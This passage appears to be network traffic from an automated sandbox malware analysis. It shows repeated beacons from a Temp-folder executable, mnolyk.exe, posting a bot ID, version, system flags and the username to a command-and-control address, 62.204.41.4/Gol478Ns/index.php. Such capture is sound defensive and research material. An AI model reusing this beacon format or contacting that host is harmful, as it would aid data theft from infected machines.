                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:20.106918097 CET540INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        34192.168.2.54972462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:39.798183918 CET234OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:39.865067005 CET235INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        340192.168.2.55003062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:20.273308039 CET541OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:20.339488983 CET541INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        341192.168.2.55003162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:20.511059046 CET542OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:20.576251030 CET542INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        342192.168.2.55003262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:20.769004107 CET543OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:20.834661007 CET543INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        343192.168.2.55003362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:21.009109974 CET544OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:21.079492092 CET544INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        344192.168.2.55003462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:21.257214069 CET545OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:21.322240114 CET545INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        345192.168.2.55003562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:21.518035889 CET546OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:21.582262039 CET546INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        346192.168.2.55003662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:21.758203030 CET547OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:21.822861910 CET547INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        347192.168.2.55003762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:21.991528988 CET548OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:22.057874918 CET548INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        348192.168.2.55003862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:22.237631083 CET549OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:22.301232100 CET549INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        349192.168.2.55003962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:22.475115061 CET550OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:22.538532972 CET550INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        35192.168.2.54972562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:43.045429945 CET235OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:43.130012035 CET236INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        350192.168.2.55004062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:22.709350109 CET551OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:22.774275064 CET551INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        351192.168.2.55004162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:22.955497026 CET552OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:23.020642996 CET552INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        352192.168.2.55004262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:23.193844080 CET553OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:23.260596991 CET553INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        353192.168.2.55004362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:23.431242943 CET554OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:23.497637987 CET554INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        354192.168.2.55004462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:23.661386967 CET555OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:23.724581003 CET555INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        355192.168.2.55004562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:23.896930933 CET556OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:23.960113049 CET556INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        356192.168.2.55004662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:24.134243011 CET557OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:24.201291084 CET557INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        357192.168.2.55004762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:24.370968103 CET558OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
